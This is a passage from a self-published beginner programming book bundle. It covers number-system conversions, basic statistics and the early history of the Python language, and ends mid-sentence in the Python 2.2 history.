
CODING

LANGUAGES

SQL, LINUX, PYTHON, MACHINE


LEARNING. THE STEP-BY-STEP
GUIDE FOR BEGINNERS TO
LEARN COMPUTER
PROGRAMMING IN A CRASH
COURSE
+ EXERCISES

JOHN S. CODE
© Copyright 2019 - All rights reserved.
The content contained within this book may not be reproduced,
duplicated or transmitted without direct written permission from
the author or the publisher.
Under no circumstances will any blame or legal responsibility be
held against the publisher, or author, for any damages, reparation,
or monetary loss due to the information contained within this book.
Either directly or indirectly.
Legal Notice:
This book is copyright protected. This book is only for personal
use. You cannot amend, distribute, sell, use, quote or paraphrase
any part, or the content within this book, without the consent of the
author or publisher.
Disclaimer Notice:
Please note the information contained within this document is for
educational and entertainment purposes only. All effort has been
executed to present accurate, up to date, and reliable, complete
information. No warranties of any kind are declared or implied.
Readers acknowledge that the author is not engaging in the
rendering of legal, financial, medical or professional advice. The
content within this book has been derived from various sources.
Please consult a licensed professional before attempting any
techniques outlined in this book.
By reading this document, the reader agrees that under no
circumstances is the author responsible for any losses, direct or
indirect, which are incurred as a result of the use of information
contained within this document, including, but not limited to, —
errors, omissions, or inaccuracies.
INTRODUCTION
First of all, congratulations on purchasing this bundle on programming languages. This book is aimed at those who are approaching programming and coding languages for the first time. It will take you through the basics, get you into practice, and give you important tips and advice on the most popular programming languages. In these texts you will have the opportunity to get to know one of the most innovative operating systems, Linux; manage and organize data with the well-known SQL language; learn to write code and master it with Python; and analyze big data with the Machine Learning book, fully entering the world of computer programming. You no longer need to feel left out at work for having no idea how to work with computer data; you can gain a clearer vision and start getting serious about your future. The world is moving forward with technology, and mastering programming languages is becoming more and more fundamental at work and for your future in general. I wish you a good read and good luck on this new adventure and for your future.
TABLE OF CONTENTS

1.
PYTHON PROGRAMMING FOR BEGINNERS:
A hands-on easy guide for beginners to learn Python programming fast,
coding language, Data analysis with tools and tricks.
John S. Code

2.
PYTHON MACHINE LEARNING:
THE ABSOLUTE BEGINNER’S GUIDE TO UNDERSTANDING NEURAL
NETWORKS, ARTIFICIAL INTELLIGENCE, DEEP LEARNING AND
MASTERING THE FUNDAMENTALS OF ML WITH PYTHON.
John S. Code

3.
LINUX FOR BEGINNERS:
THE PRACTICAL GUIDE TO LEARN LINUX OPERATING SYSTEM
WITH THE PROGRAMMING TOOLS FOR THE INSTALLATION,
CONFIGURATION AND COMMAND LINE + TIPS ABOUT HACKING
AND SECURITY.
John S. Code

4.
SQL COMPUTER PROGRAMMING FOR
BEGINNERS:
LEARN THE BASICS OF SQL PROGRAMMING WITH THIS STEP-BY-
STEP GUIDE IN THE MOST EASY AND COMPREHENSIVE WAY FOR
BEGINNERS, INCLUDING PRACTICAL EXERCISES.
John S. Code
PYTHON PROGRAMMING FOR
BEGINNERS:
A HANDS-ON EASY GUIDE FOR
BEGINNERS TO LEARN PYTHON
PROGRAMMING FAST, CODING
LANGUAGE, DATA ANALYSIS
WITH TOOLS AND TRICKS.

JOHN S. CODE


Table of Contents
Introduction
Chapter 1 Mathematical Concepts
Chapter 2 What Is Python
Chapter 3 Writing The First Python Program
Chapter 4 The Python Operators
Chapter 5 Basic Data Types In Python
Chapter 6 Data Analysis with Python
Chapter 7 Conditional Statements
Chapter 8 Loops – The Never-Ending Cycle
Chapter 9 File handling
Chapter 10 Exception Handling
Chapter 11 Tips and Tricks For Success
Conclusion
Introduction
Python is an excellent choice for machine learning for a few
reasons. First of all, it is a simple language on the surface. Even if
you are not familiar with Python, getting up to speed is quick if
you have ever used any other language with C-like syntax.
Second, Python has an incredible community, which results in great
documentation and friendly, extensive answers on Stack
Overflow (essential!).
Third, thanks to that huge community, there are a lot of useful
libraries for Python (both "batteries included" and third party),
which take care of essentially any problem that you can have
(including machine learning).
History of Python
Python was invented in the later years of the 1980s. Guido van
Rossum, the founder, started using the language in December 1989.
He is Python's only known creator and his integral role in the
growth and development of the language has earned him the
nickname "Benevolent Dictator for Life". It was created to be the
successor to the language known as ABC.
The next version to be released was Python 2.0, in October of
the year 2000, and it had significant upgrades and new features,
including a cycle-detecting garbage collector and support
for Unicode. Most fortunately, this particular version
made vast improvements to the language, which became
more straightforward and community-backed.
Python 3.0, which initially started its existence as Py3K, was
rolled out in December of 2008 after a rigorous
testing period. Unfortunately, this particular version of Python was
not backward compatible with previous versions. Yet, a significant
number of its major features have been backported to versions 2.6
and 2.7 (Python), and Python 3 ships with the 2to3 utility, which
helps to automate the translation of Python 2 scripts.
Python 2.7's end-of-life date was originally supposed to be back
in 2015, but it was put off until the year 2020, largely because of
a major concern that existing code could not easily be rolled
back but had to be rolled FORWARD into the new version,
Python 3. In 2017, Google declared that there would be work
done on Python 2.7 to enhance execution under
concurrently running tasks.
Basic features of Python
Python is a clear and extremely robust programming language,
object-oriented and broadly similar to Ruby, Perl, and Java. A
portion of Python's remarkable highlights:
• Python uses an elegant structure, making the programs you
compose easier to read and analyze.
• It comes with a huge standard library that supports tons of
simple programming tasks, for example, extremely seamless
web server connections, processing and handling files, and
the ability to search through text with commonly used
expressions and commands.
• Python's easy-to-use interactive interpreter makes it simple
to test shorter pieces of code. It also comes with IDLE, a
basic "development environment".
The Python programming language is one of many different
coding languages out there for you. Some are best suited to
helping out with websites. There are those that help with
gaming, or with specific projects that you want to handle. But when
it comes to finding a great general-purpose language, one that is
able to handle a lot of different tasks all at once, the Python
coding language is the one for you.
There are a lot of different benefits to working with the Python
language. You will find that Python is easy enough for a beginner
to learn how to work with. It has a lot of power behind it, and there
is a community of programmers and developers who are going to
work with this language to help you find the answers that you are
looking for. These are just some of the benefits that we get to enjoy
with the Python language, and part of the reason why we will want
to get started with this language as soon as possible!
The Python programming language is a great general-purpose
language that is able to take care of all your computing and
programming needs. It is also freely available and can make
solving some of the bigger computer programs that you have as
easy as writing out some of the thoughts that you have about that
solution. You are able to write out the code once, and then, it is
able to run on almost any kind of program that you would like
without you needing to change up the program at all.
How is Python used?
Python is one of the best programming languages that is a general-
purpose and is able to be used on any of the modern operating
systems that you may have on your system. You will find that
Python has the capabilities of processing images, numbers, text,
scientific data, and a lot of other things that you would like to save
and use on your computer.
Python may seem like a simple coding language to work with, but
it has a lot of the power and more that you are looking for when it
is time to start with programming. In fact, many major businesses,
including YouTube, Google, and more, already use this coding
language to help them get started on more complex tasks.
Python is also known as an interpreted language. This means
that it is not converted into code that is readable by the
computer before the program is run; instead, this is only going to
happen at runtime. Python and other interpreted languages have
changed the perception of this kind of coding and have ensured that it
is an accepted and widely used approach for many of the
projects that you would like to handle.
There are a lot of different tasks that the Python language is able to
help you complete. Some of the different options that you are able
to work with include:

1. Programming any of the CGI that you need on your web applications.
2. Learning how to build up your own RSS reader.
3. Working with a variety of files.
4. Creating a calendar with the help of HTML.
5. Being able to read from and write to MySQL.
6. Being able to read from and write to PostgreSQL.
The Benefits of Working with Python
When it comes to working with the Python language, you will find
that there are a lot of benefits with this kind of coding language. It
is able to help you to complete almost any kind of coding process
that you would like and can still have some of the ease of use that
you are looking for. Let’s take a quick look at some of the benefits
that come with this kind of coding language below:

• Beginners can learn it quickly. If you have always
wanted to work with a coding language, but you have
been worried about how much work it is going to take,
or that it will be too hard for you to handle, then
Python is the best option. It is simple to use and has
been designed with the beginner in mind.
• It has a lot of power to enjoy. Even though Python is
easy enough for a beginner to learn how to use, that
doesn't mean that you are going to be limited in the
power that you are able to get out of your code.
You will find that the Python language has
all the power, and more, that you need to get so many
projects done.
• It can work with other coding languages. When we get
to work on data science and machine learning, you will
find that this is really important. There are some
projects where you will need to combine Python with
another language, and it is easier to do than you may
think!
• It is perfect for everything from simple projects all the
way up to more complex options like machine learning
and data analysis. This will help you to complete any
project that you would like.
• There are a lot of extensions and libraries that come
with the Python language, which makes it the best
option for you to choose for all your projects. There
are a lot of libraries that you are able to add to Python
to make sure that it has the capabilities that you need.
• There is a large community that comes with Python.
This community can answer your questions, show you
some of the different codes that you can work with,
and more. As a beginner, it is always a great idea to
work with some of these community members to
ensure that you are learning as much as possible about
Python.
When it comes to handling many of the codes and more that you
would like in your business or on other projects, nothing is going to
be better than working with the Python language. In this
guidebook, we will spend some time exploring the different aspects
of the Python language, and some of the different things that you
are able to do with this coding language as well.
Mathematical Concepts
As we have stated before, computers are physical manifestations of
several mathematical concepts. Mathematics is the scientific
language of problem solving. Over the centuries, mathematicians
have theoretically solved many complex issues. Mathematics
includes concepts like algebra and geometry.
Number Systems
Mathematics is a game of number manipulation which makes
number systems at the center stage of mathematical concepts.
There are several different types of number systems. Before we
take a look at the number systems, we have to understand the
concept of coding.
Coding
A way to represent values using symbols is called coding. Coding
is as old as humans. Before the number systems we use today, there
were other systems to represent values and messages. An example
of coding from ancient times is the Egyptian hieroglyphs.

Number systems are also examples of coding because values are
represented using special symbols.
There are different types of number systems, and we are going to
discuss a few relevant ones.
Binary System
A binary system has only two symbols, 1 and 0 which are referred
to as bits. All the numbers are represented by combining these two
symbols. Binary systems are ideal for electronic devices because
they also have only two states, on or off. In fact, all electronic
devices are based on the binary number system. The number
system is positional which means the position of symbols
determines the final value. Since there are two symbols in this
system, the system has a base of 2.
The sole purpose of input and output systems is to convert data to
and from binary system to a form that makes better sense to the
user. The first bit from the left side is called Most Significant Bit
(MSB) while the first bit from the right is called the Least
Significant Bit (LSB).
Here is the binary equivalent code of “this is a message”:
01110100 01101000 01101001 01110011 00100000 01101001
01110011 00100000 01100001 00100000 01101101 01100101
01110011 01110011 01100001 01100111 01100101
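The encoding above is standard 8-bit ASCII. As a quick sketch (the helper name is our own), Python's built-in ord() and format() can reproduce it:

```python
def text_to_binary(text):
    """Return the 8-bit binary code of each character, space-separated.
    format(n, "08b") renders n in base 2, zero-padded to 8 bits."""
    return " ".join(format(ord(ch), "08b") for ch in text)

# Prints the same 17 eight-bit groups shown above.
print(text_to_binary("this is a message"))
```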
Decimal System
The decimal system has ten symbols, the numbers 0 through 9.
This is also a positional number system where the position of
symbols changes the value it represents. All the numbers in this
system are created with different combinations of the initial ten
symbols. This system has a base 10.
This is also called the Hindu-Arabic number system. Decimals
make more sense to humans and are used in daily life. There are
two reasons for that:
1. Creating large numbers from the base symbols follows a consistent pattern.
2. Performing arithmetic operations in a decimal system is easier compared to other systems.
Hexadecimal System
The hexadecimal number system is the only one of these that has
letters as symbols. It has the 10 symbols of the decimal system
plus the six letters A, B, C, D, E, and F. This is also a positional
number system, with a base of 16.
Hexadecimal system is extensively used to code instructions in
assembly language.
Number System Conversion
We can convert the numbers from one system to another. There are
various online tools to do that. Python also offers number
conversion, but it is better to learn how it is done manually.
Binary to Decimal
Here’s a binary number 01101001, let’s convert it to a decimal
number.
( 01101001 )2 = 0 x 2^7 + 1 x 2^6 + 1 x 2^5 + 0 x 2^4 + 1 x 2^3 + 0 x 2^2 + 0 x 2^1 + 1 x 2^0
( 01101001 )2 = 0 + 64 + 32 + 0 + 8 + 0 + 0 + 1
( 01101001 )2 = ( 105 )10
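This worked example can be checked in Python, whose built-in int() accepts a base argument (a small sketch; the variable names are our own):

```python
# Check the binary-to-decimal example with int(), which parses a
# string in any base between 2 and 36.
binary = "01101001"
decimal = int(binary, 2)
print(decimal)  # 105

# The same positional sum written out by hand: weights 2**0, 2**1, ...
# starting from the least significant bit.
manual = sum(int(bit) * 2**power
             for power, bit in enumerate(reversed(binary)))
assert manual == decimal == 105
```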
Decimal to Binary
To convert a decimal number to binary, we repeatedly
divide the number by two until the quotient becomes zero,
recording the remainder generated at each division step. Reading
the remainders from the last one to the first gives us the binary
equivalent of the decimal number.

An interesting thing to note here is that ( 01101001 )2 and
( 1101001 )2 represent the same decimal number ( 105 )10. It means
that, just like in the decimal number system, leading zeros can be
ignored in the binary number system.
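The repeated-division method described above can be sketched in a few lines of Python (the function name is our own):

```python
def decimal_to_binary(n):
    """Repeatedly divide by 2, collecting remainders (LSB first),
    then reverse them to get the binary digits in the right order."""
    if n == 0:
        return "0"
    bits = []
    while n > 0:
        n, remainder = divmod(n, 2)  # quotient and remainder in one step
        bits.append(str(remainder))
    return "".join(reversed(bits))

print(decimal_to_binary(105))  # 1101001
```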
Binary to Hexadecimal
Binary numbers can be converted to hexadecimal equivalents using
two methods.

1. Convert the binary number to decimal, then the decimal to a hexadecimal number.
2. Break the binary number into groups of four bits and convert each to its hexadecimal equivalent, keeping the groups' positions in the original binary number intact.
Let’s convert ( 1101001 )2 to a hexadecimal number using the
second method. The first step is to break the binary number into
different groups each of four bits. If the MSB group has less than
four bits, make it four by adding leading zeros. Grouping starts
from the LSB. So, ( 1101001 )2 will give us ( 1001 )2 and ( 0110 )2.
Now, remembering their position in the original binary number, we
are going to convert each group to a hexadecimal equivalent.
Here is the table of hexadecimal equivalents of four-bit binary
numbers.
Binary Hexadecimal
0000 0
0001 1
0010 2
0011 3
0100 4
0101 5
0110 6
0111 7
1000 8
1001 9
1010 A
1011 B
1100 C
1101 D
1110 E
1111 F

From the table, we can see ( 1001 )2 is ( 9 )16 and ( 0110 )2, the
MSB group, is ( 6 )16.
Therefore, ( 1101001 )2 = ( 01101001 )2 = ( 69 )16
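The grouping method can be sketched in Python as follows (a minimal illustration; the helper name and padding logic are our own):

```python
def binary_to_hex(bits):
    """Group bits in fours from the LSB and map each group to a
    hexadecimal digit, padding the MSB side with leading zeros."""
    # Round the length up to the next multiple of four before grouping.
    padded = bits.zfill((len(bits) + 3) // 4 * 4)
    groups = [padded[i:i + 4] for i in range(0, len(padded), 4)]
    # format(..., "X") renders an integer as an uppercase hex digit.
    return "".join(format(int(group, 2), "X") for group in groups)

print(binary_to_hex("1101001"))  # 69
```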
Hexadecimal to binary
We can use the above given table to quickly convert hexadecimal
numbers to binary equivalents. Let’s convert ( 4EA9 )16 to binary.
( 4 )16 = ( 0100 )2
( E )16 = ( 1110 )2
( A )16 = ( 1010 )2
( 9 )16 = ( 1001 )2
So, ( 4EA9 )16 = ( 0100111010101001 )2 = ( 100111010101001 )2
Decimal to Hexadecimal
You can say hexadecimal is an extended version of the decimal system.
Let's convert ( 45781 )10 to hexadecimal. But, first, we have to
remember this table.
Decimal Hexadecimal
0 0
1 1
2 2
3 3
4 4
5 5
6 6
7 7
8 8
9 9
10 A
11 B
12 C
13 D
14 E
15 F

We are going to divide the decimal number repeatedly by 16 and
record the remainders. The final hexadecimal equivalent is formed
by replacing the remainder decimals with their correct hexadecimal
symbols. Converting ( 45781 )10 this way gives ( B2D5 )16.
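As a sketch of the repeated division by 16 (the function name is our own), Python's divmod() handles the quotient and remainder in one step:

```python
def decimal_to_hex(n):
    """Repeatedly divide by 16, mapping each remainder to its
    hexadecimal symbol; remainders come out LSB first."""
    digits = "0123456789ABCDEF"
    if n == 0:
        return "0"
    out = []
    while n > 0:
        n, remainder = divmod(n, 16)
        out.append(digits[remainder])
    return "".join(reversed(out))

print(decimal_to_hex(45781))  # B2D5
```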
Hexadecimal to Decimal
Let’s convert ( 4EA9 )16 to its decimal equivalent.
( 4EA9 )16 = 4 x 16^3 + 14 x 16^2 + 10 x 16^1 + 9 x 16^0
( 4EA9 )16 = 16384 + 3584 + 160 + 9
( 4EA9 )16 = ( 20137 )10
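The same positional sum can be verified in Python (a small sketch using names of our own choosing):

```python
# Each hex digit is weighted by a power of 16, counted from the
# rightmost digit; int(d, 16) converts a single digit like "E" to 14.
hex_digits = "4EA9"
value = sum(int(digit, 16) * 16**power
            for power, digit in enumerate(reversed(hex_digits)))
assert value == int("4EA9", 16) == 20137
print(value)  # 20137
```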
There’s another number system, the octal system, with eight
unique symbols: 0, 1, 2, 3, 4, 5, 6, and 7. It was popular on
small-scale devices that worked on small values with limited
resources. With the rapid advancements in storage and other
computer resources, the octal system largely fell out of favor
compared to the hexadecimal number system, though you might
still find an old octal-based computer system.

Fractions (Floating Points)
The decimal number system supports a decimal point '.' to represent
portions/slices of a value. For example, if we want to say half of a
milk bag is empty using numbers, we can write that 0.5 or ½ of the
milk bag is empty. Do other number systems support a decimal point?
Yes, they do. Let's see how to convert ( 0.75 )10 or ( ¾ )10 to
binary.
¾ x 2 = 6/4 = 1 . ( 2/4 )
2/4 x 2 = 4/4 = 1
( 0.75 )10 = ( ¾ )10 = ( .11 )2
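The multiply-by-two steps above can be sketched in Python (the function name and the bit cap are our own; the cap matters because many fractions, such as 0.1, never terminate in binary):

```python
def fraction_to_binary(x, max_bits=16):
    """Multiply the fraction by 2 repeatedly; each integer part that
    appears is the next bit after the binary point."""
    bits = []
    while x > 0 and len(bits) < max_bits:
        x *= 2
        bit, x = divmod(x, 1)  # integer part is the next bit
        bits.append(str(int(bit)))
    return "." + "".join(bits)

print(fraction_to_binary(0.75))  # .11
```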
Negatives
In the decimal system, a dash or hyphen ‘-’ is placed before a
number to declare it as a negative. There are different ways to
denote negative numbers in the binary system. The easiest is to
consider the MSB as a sign bit, which means if MSB is 1, the
number is negative and if the MSB is 0, the number is positive.
Determining if a hexadecimal number is negative or positive is a
bit tricky. The easiest way is to convert the number into binary and
perform the checks for negatives in binary system.
Linear Algebra
Did you hate algebra in school? I have some bad news for you!
Linear algebra is heavily involved in programming because it's one
of the best mathematical ways to solve problems. According to
Wikipedia, algebra is the study of mathematical symbols and the
rules for manipulating these symbols. The field advanced thanks to
the works of Muhammad ibn Musa al-Khwarizmi, who introduced
the reduction and balancing methods and treated algebra as an
independent field of mathematics. During that era, variable
notation such as 'x' and 'y' wasn't widespread; during the
Islamic Golden Age, scholars had a fondness for lengthy "layman's
terms" descriptions of problems and solutions, and that is how
al-Khwarizmi explained algebra concepts in his book. The book dealt
with many practical real-life problems, including in the fields of
finance, planning, and law.
So, we know what algebra is. But where does "linear" come
from? For that, we have to understand what a linear system is. It is
a mathematical model where the system attributes (variables) have
a linear relation among themselves. The easiest way to explain this
is that if the plot between system attributes is a straight line, the
system is linear. Linear systems are much simpler than nonlinear
systems. The set of algebraic concepts that relate to linear systems
is referred to as linear algebra. Linear algebra helps resolve system
problems such as missing attribute values. The first step is to create
linear equations that establish the relationship between the system
variables.

Statistics
Statistics is another important field of mathematics that is crucial
in various computer science applications. Data analysis and machine
learning wouldn't be what they are without the advancements made in
statistical concepts during the 20th century. Let's see some concepts
related to statistics.
Outlier
Outlier detection is very important in statistical analysis. It helps in
homogenizing the sample data. After detecting the outliers, what to
do with them is crucial because they directly affect the analysis
results. There are many possibilities including:
Discarding Outlier
Sometimes it’s better to discard outliers because they have been
recorded due to some error. This usually happens where the
behavior of the system is already known.
System Malfunction
But, outliers can also indicate a system malfunction. It is always
better to investigate the outliers instead of discarding them
straightaway.
Average
Finding the center of a data sample is crucial in statistical analysis
because it reveals a lot of system characteristics. There are different
types of averages, each signifying something important.
Mean
Mean is the most common average. All the data values are added
together, and the sum is divided by the number of values. For
example, you sell shopping bags to a well-renowned grocery store
and they want to know how much each shopping bag can carry.
You completely fill 5 shopping bags with random grocery items
and weigh them. Here are the readings in pounds.
5.5, 6.0, 4.95, 7.1, 5.0
You calculate the mean as (5.5 + 6 + 4.95 + 7.1 + 5) / 5 = 5.71.
You can tell the grocery store your grocery bags hold 5.71 lbs on
average.
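The calculation can be checked with plain Python, and the standard library's statistics module agrees (a sketch; the variable names are our own):

```python
import statistics

# The five bag weights, in pounds, from the example above.
weights = [5.5, 6.0, 4.95, 7.1, 5.0]

# Mean: sum of values divided by how many there are.
mean = sum(weights) / len(weights)
print(round(mean, 2))  # 5.71

# The standard library computes the same thing.
assert abs(statistics.mean(weights) - mean) < 1e-9
```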
Median
Median is the center value with respect to the position of data in a
sample data when it’s sorted in ascending order. If sample data has
odd members, the median is the value with an equal number of
values on both flanks. If sample data has an even number of values,
the median is calculated by finding the mean of two values in the
middle with equal number of items on both sides.
Mode
Mode is the most recurring value in a dataset. If there is no
recurring value in the sample data, there is no mode.
Variance
To find how much each data value in a sample data changes with
respect to the average of the sample data, we calculate the variance.
Here is a general formula to calculate variance.
sum of (each data point - mean of sample points )2 / number of data
points in the sample.
If the variance is low in a sample data, it means there are no
outliers in the data.
Standard Deviation
We take the square root of variance to find standard deviation. This
relates the mean of sample data to the whole of sample data.
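Using the same bag weights from the mean example, here is a quick sketch of the variance formula above, checked against the standard library's statistics.pvariance and statistics.pstdev (the names in the sketch are our own):

```python
import statistics

weights = [5.5, 6.0, 4.95, 7.1, 5.0]
mean = sum(weights) / len(weights)

# Population variance: average squared distance from the mean.
variance = sum((w - mean) ** 2 for w in weights) / len(weights)

# Standard deviation is the square root of the variance.
std_dev = variance ** 0.5

assert abs(variance - statistics.pvariance(weights)) < 1e-9
assert abs(std_dev - statistics.pstdev(weights)) < 1e-9
print(round(variance, 4), round(std_dev, 4))  # 0.6284 0.7927
```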
Probability
No one can accurately tell what will happen in the future. We can
only predict what is going to happen with some degree of certainty.
The probability of an event is written mathematically as,
Probability = number of possible ways an event can happen / total
number of possibilities
A few points:
1. Probability can never be negative.
2. Probability ranges between zero and one.
3. To calculate probability, we assume that the set of events we are working with occur independently, without any interference.
Finding the probability of an event can change the probability of
something happening in a subsequent event. It depends upon how
we are interacting with the system to find event probabilities.
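As a small illustration of the formula (the die example is our own, not from the text):

```python
from fractions import Fraction

# Probability of rolling an even number with a fair six-sided die:
# 3 favourable outcomes (2, 4, 6) out of 6 equally likely ones.
favourable = 3
total = 6
p = Fraction(favourable, total)  # exact arithmetic, no rounding

assert 0 <= p <= 1  # never negative, never above one
print(p)  # 1/2
```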
Distribution
There are many types of distributions. In this book, whenever we
talk about distribution, we refer to probability distribution unless
explicitly stated otherwise. Let’s take an example of flipping coins
and see what is the distribution of such events.
HHH
HHT
HTH
TTT
THH
HTT
THT
TTH
This is a very simple event with only a handful of possible
outcomes. We can easily determine the probability of different
outcomes. But, this is almost impossible in complex systems with
thousands or millions of possible outcomes. Distributions work
much better in such cases by visually representing the probability
curve. It makes more sense than looking at a huge table of fractions
or small decimal numbers.
We call a probability distribution discrete if the possible outcomes
are countable and known beforehand.
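The eight sequences above can be generated and tallied with the standard library (a sketch; the names are our own):

```python
from itertools import product
from collections import Counter

# Enumerate every outcome of three coin flips, mirroring the eight
# sequences listed in the text.
outcomes = ["".join(flips) for flips in product("HT", repeat=3)]
assert len(outcomes) == 8

# Distribution of the number of heads across all outcomes.
heads_distribution = Counter(outcome.count("H") for outcome in outcomes)
print(dict(heads_distribution))  # {3: 1, 2: 3, 1: 3, 0: 1}
```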
What Is Python
Python is going to be a programming language that is known as
interpreted, general-purpose, high-level, and multiparadigm.
Python is going to allow the programmers who use it some
different styles of programming in order to create simple or even
some complex programs, get quicker results than before, and write
out code almost as if they are speaking in a human language, rather
than like they are talking to a computer.
This language is so popular that you will find a lot of major
companies that are already using it for their systems, including
Google App Engine, Google Search, YouTube, iRobot machines
and more. And as the knowledge about this language continues to
increase, it is likely that we are going to see even more of the
applications and sites that we rely on each day working with this
language as well.
The initial development of Python was started by Guido van
Rossum in the late 1980s. Today, it is going to be developed and
run by the Python Software Foundation. Because of the features
behind this language, programmers of Python can accomplish their
tasks with many different styles of programming. Python can be
used for a variety of things as well including serial port access,
game development, numeric programming, and web development
to name a few.
There are going to be a few different attributes that we can look at
that show us why the development time that we see in Python is
going to be faster and more efficient than what we are seeing with
some of the other programming languages out there. These will
include:

1. Python is an interpreted language. This means that
there is no need for us to compile the code before we
try to execute the program, because Python will not
need this compilation in the background. It is also
a more high-level language that abstracts many
sophisticated details away from the programming code.
Much of this abstraction is focused on making the code
understandable even by those who are just getting
started with coding.
2. Python programs are often going to be shorter than
similar programs in other languages. Although Python
offers fast development times, keep in mind that the
execution time is going to lag a little bit. Compared to
fully compiled languages, such as C and C++, Python
is going to execute at a slower rate. Of course, with
the processing speeds that we see in most computers
today, the differences in speed are not really going to
be noticed by the people who are using the system.
There are a lot of different things that we are able to do when it
comes to the Python language, and we are going to spend some
time looking at how we can do some of the different parts as well.
From some of the basics that we are able to do with the help of
Python all the way to some of the more complex things that we are
able to do with data science and machine learning that we can talk
about a little later.
And all of this can be done with the ease of the Python language.
You will find that when we spend some time focusing on this
language and some of the basics that we are able to do will help to
prepare us for some of the more complicated things that we are
able to do with this code as well.
A. WHY TO LEARN PYTHON
Learning the ABCs of anything in this world is a must. Knowing
the essentials is winning half the battle before you get started. It's
easier to proceed when you are equipped with the fundamentals of
what you are working on.
In the same manner, before you embark on the other aspects of
Python, let us level off on the basic elements first. You need to learn
and understand the basics of Python as a foundation for advancing to
the more complicated components. This fundamental information
will greatly help you as you go on, and it will make the learning
experience easier and more enjoyable.
Familiarize yourself with the official Python website,
https://www.python.org/. Knowing the Python website well
gives you leverage in acquiring more information and
scaling up your knowledge of Python. You can also find the
links you need for your work there.
Learn from Python collections. Locate Python resources such as
records, books, papers, files, documentation, and archives, and
learn from them. You can pick up a number of lessons from these and
expand your knowledge of Python. There are also tutorials,
communities, and forums at your disposal.
Possess the SEO basics. Acquire some education in Search Engine
Optimization so you can interact with experts in the field and
improve your level of Python knowledge. That being said, here are
the basic elements of Python.
B. DIFFERENT VERSIONS OF PYTHON
With Guido van Rossum at the helm of affairs, Python has witnessed several versions over the years since its conception in the '80s. These versions represent the growth, development, and evolution of the scripting language over time, and no history of Python can be told without them.
The versions of Python include the following:
• Python 0.9.0:
The first-ever version of Python, released following its implementation and in-house releases at the Centrum Wiskunde & Informatica (CWI) between the years 1989 and 1990, was tagged version 0.9.0. This early version, which was released on alt.sources, had features such as exception handling, functions, and classes with inheritance, as well as the core data types list, str, dict, and others. The first release came with a module system obtained from Modula-3, which Van Rossum described as one of the major programming units used in the development of Python.
Another similarity the first release bore with Modula-3 is found in the exception model, which comes with an added else clause. With the public release of this early version came a flurry of users, which culminated in the formation of a primary discussion forum for Python in 1994. The group was named comp.lang.python and served as a milestone for the growing popularity of Python.
Following the release of the first version on the 20th of February, 1991, seven further updates were made under the 0.9.x label, spread out over nearly three years (1991 to 1993). The first update came in the form of Python 0.9.1, released in the same month of February 1991 as its predecessor. The next update came in the autumn of the release year, under the label Python 0.9.2. By Christmas Eve of the same year (1991), Python published Python 0.9.4. On the 2nd of January of the succeeding year, a gift update labeled Python 0.9.5 was released, and by the 6th of April, 1992, Python 0.9.6 followed. It wasn't until the next year, 1993, that Python 0.9.8 was released. The final update to the earliest version came five months later, on the 29th of July, 1993, and was dubbed Python 0.9.9. These updates marked the first generation of Python development before it transcended into the next version label.
• Python 1.0
After the last update to Python 0.9.0, a new version, Python 1.0, was released in January of the following year. The year 1994 marked the addition of key new features to the Python programming language.
Functional programming tools such as map, reduce, filter, and
lambda were part of the new features of the version 1 release. Van
Rossum mentioned that the obtainment of map, lambda, reduce and
filter was made possible by a LISP hacker who missed them and
submitted patches that worked. Van Rossum's contract with CWI
came to an end with the release of the first update version 1.2 on
the 10th of April, 1995. In the same year, Van Rossum went on to
join CNRI (Corporation for National Research Initiatives) in
Reston, Virginia, United States, where he continued to work on
Python and published different version updates.
Nearly six months following the first version update, version 1.3
was released on the 12th of October, 1995. The third update,
version 1.4, came almost a year later in October of 1996. By then,
Python had developed numerous added features. Some of the
typical new features included an inbuilt support system for
complex numbers and keyword arguments which, although
inspired by Modula-3, shared a bit of a likeness to the keyword
arguments of Common Lisp. Another included feature was a simple form of data hiding through name mangling, although it could easily be bypassed.
It was during his days at CNRI that Van Rossum began the CP4E
(Computer Programming for Everybody) program which was
aimed at making more people get easy access to programming by
engaging in basic literacy of programming languages. Python was a pivotal element of Van Rossum's campaign, and owing to its concentration on clean syntax, it was an already suitable programming language. Also, since the goals of ABC and CP4E were quite similar, there was no hassle in putting Python to use. The program was pitched to and funded by DARPA, although it became inactive in 2007 after running for eight years. However, Python still tries to be relatively easy to learn by not being too arcane in its semantics and syntax, although reaching out to non-programmers is no longer a priority.
The year 2000 marked another significant step in the development of Python when the Python core development team switched to a new platform, BeOpen, where a new group, the BeOpen PythonLabs team, was formed. At the request of CNRI, a new version update, 1.6, was released on the 5th of September 2000, succeeding the previous version update (Python 1.5) of December 1997. This update marked the complete cycle of development for the programming language at CNRI, because the development team left shortly afterward. This change affected the release timelines of the new version Python 2.0 and the version 1.6 update, causing them to clash. It was only a question of time before Van Rossum and his crew of PythonLabs developers switched to Digital Creations, with Python 2.0 being the only version ever released by BeOpen.
With the version 1.6 release caught between a switch of platforms, it didn't take long for CNRI to include a license in the release of Python 1.6. The license contained in the release was quite a bit longer than the previously used CWI license, and it featured a clause mentioning that the license was under the protection of the laws applicable to the State of Virginia. This intervention sparked a legal feud which drew the Free Software Foundation into a debate regarding the "choice-of-law" clause being incompatible with the GNU General Public License. At this point, there was a call for negotiations between the FSF, CNRI, and BeOpen regarding a change to Python's free software license which would make it compatible with the GPL. The negotiation process resulted in the release of another version update under the name Python 1.6.1. This new version was no different from its predecessor aside from a few new bug fixes and the newly added GPL-compatible license.
• Python 2.0:
After the many legal dramas surrounding the release of the second generation, which culminated in the release of an unplanned update (version 1.6.1), Python was keen to put it all behind and forge ahead. So, in October of 2000, Python 2.0 was released. The new release featured additions such as list comprehensions, which were obtained from the functional programming languages Haskell and SETL. The syntax of this latest version was akin to that found in Haskell, but differed in that Haskell used punctuation characters while Python stuck to alphabetic keywords.
Python 2.0 also featured a garbage collection system which was able to collect reference cycles. A version update (Python 2.1) quickly followed the release of Python 2.0, as did Python 1.6.1. However, due to the legal issue over licensing, Python renamed the license on the new release to the Python Software Foundation License. As such, every new specification, code or documentation added from the release of version update 2.1 was owned and protected by the PSF (Python Software Foundation), a nonprofit organization created in the year 2001 and designed similarly to the Apache Software Foundation. The release of version 2.1 came with changes made to the language specification, allowing support of nested scopes as in other statically scoped languages. However, this feature was off by default and not required until the release of the next update, version 2.2, on the 21st of December, 2001.
Python 2.2 came with a significant innovation of its own in the
form of a unification of all Python's types and classes. The
unification process merged the types coded in C and the classes
coded in Python into a single hierarchy. The unification process
caused Python's object model to remain totally and continuously
object-oriented. Another significant innovation was the addition of
generators as inspired by Icon. Two years after the release of
